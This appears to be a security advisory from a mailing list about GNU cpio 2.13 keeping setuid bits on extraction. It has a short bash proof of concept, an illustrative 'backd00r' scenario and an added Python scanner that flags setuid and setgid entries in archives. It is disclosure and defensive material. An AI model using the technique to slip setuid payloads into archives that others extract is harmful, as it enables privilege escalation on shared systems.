Headline
cpio 2.13 Privilege Escalation
cpio version 2.13 suffers from a privilege escalation vulnerability via setuid files in a cpio archive.
cpio privilege escalation vulnerability via setuid files in cpio archive

Happy New Year, let in 2024 happiness be with you! :)

When extracting archives, cpio (at least version 2.13) preserves the setuid flag, which might lead to privilege escalation.

One example: r00t extracts an archive to /tmp/ and scidiot then runs /tmp/micq/backd00r without any further interaction from root.

We believe this is a vulnerability, since directory traversal in cpio is considered a vulnerability.

The POC is trivial; the bash script follows.

====
#!/bin/bash
# cpio privilege escalation via setuid files in cpio archive
# author: Georgi Guninski
# date: Mon Jan 8 07:28:28 AM UTC 2024
# tested on cpio (GNU cpio) 2.13
mkdir -p /tmp/1
cd /tmp/1
touch a
chmod 4555 a
echo -n a | cpio -ocv0 > a.cpio
mkdir -p /tmp/2
cd /tmp/2
cpio -iv < ../1/a.cpio
ls -lh /tmp/2/a
#-r-sr-xr-x. 1 joro joro 0 Jan 8 09:10 /tmp/2/a
====
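A check a defender can run before extracting an untrusted archive is to list every entry whose mode carries a setuid or setgid bit. The scanner below is an added example, not part of the original advisory: it parses the SVR4 "newc" header format (assumed here to be what GNU cpio's -c writes) and runs over a constructed in-memory archive whose first entry has the same 4555 mode as the PoC's file.

```python
import stat

NEWC_MAGIC = b"070701"   # SVR4 "newc" format without CRC
HEADER_LEN = 110         # 6-byte magic + 13 ASCII-hex fields of 8 bytes
FIELDS = ("ino", "mode", "uid", "gid", "nlink", "mtime", "filesize", "devmajor",
          "devminor", "rdevmajor", "rdevminor", "namesize", "check")


def _pad4(n):
    """newc pads name and data so the next item starts on a 4-byte boundary."""
    return (4 - n % 4) % 4


def build_newc_entry(name, mode, data=b""):
    """Emit one newc entry (header + NUL-terminated name + data). Constructed helper."""
    namesize = len(name) + 1
    fields = [0, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, namesize, 0]
    hdr = NEWC_MAGIC + b"".join(b"%08x" % v for v in fields)
    body = name.encode() + b"\0"
    body += b"\0" * _pad4(HEADER_LEN + len(body))
    return hdr + body + data + b"\0" * _pad4(len(data))


def iter_newc(archive):
    """Yield (name, mode) for each entry up to the TRAILER!!! record."""
    off = 0
    while off + HEADER_LEN <= len(archive):
        hdr = archive[off:off + HEADER_LEN]
        if hdr[:6] != NEWC_MAGIC:
            raise ValueError("not a newc header at offset %d" % off)
        e = dict(zip(FIELDS, (int(hdr[6 + 8 * i:14 + 8 * i], 16) for i in range(13))))
        name_start = off + HEADER_LEN
        name = archive[name_start:name_start + e["namesize"] - 1].decode()
        if name == "TRAILER!!!":
            return
        yield name, e["mode"]
        data_start = name_start + e["namesize"] + _pad4(HEADER_LEN + e["namesize"])
        off = data_start + e["filesize"] + _pad4(e["filesize"])


def find_privileged_entries(archive):
    """Return (name, permission bits) for regular files that would extract setuid/setgid."""
    return [(n, oct(m & 0o7777)) for n, m in iter_newc(archive)
            if stat.S_ISREG(m) and m & (stat.S_ISUID | stat.S_ISGID)]


# Constructed sample: a setuid file like the PoC's "a", a harmless file, and the trailer.
SAMPLE_ARCHIVE = (build_newc_entry("a", 0o104555)
                  + build_newc_entry("notes.txt", 0o100644, b"hi\n")
                  + build_newc_entry("TRAILER!!!", 0))

if __name__ == "__main__":
    import sys
    for name, bits in find_privileged_entries(open(sys.argv[1], "rb").read()):
        print(name, bits)
```

Run it against a real file (for example the PoC's a.cpio) with `python3 scan.py a.cpio`; any line printed is an entry to strip or refuse before extraction.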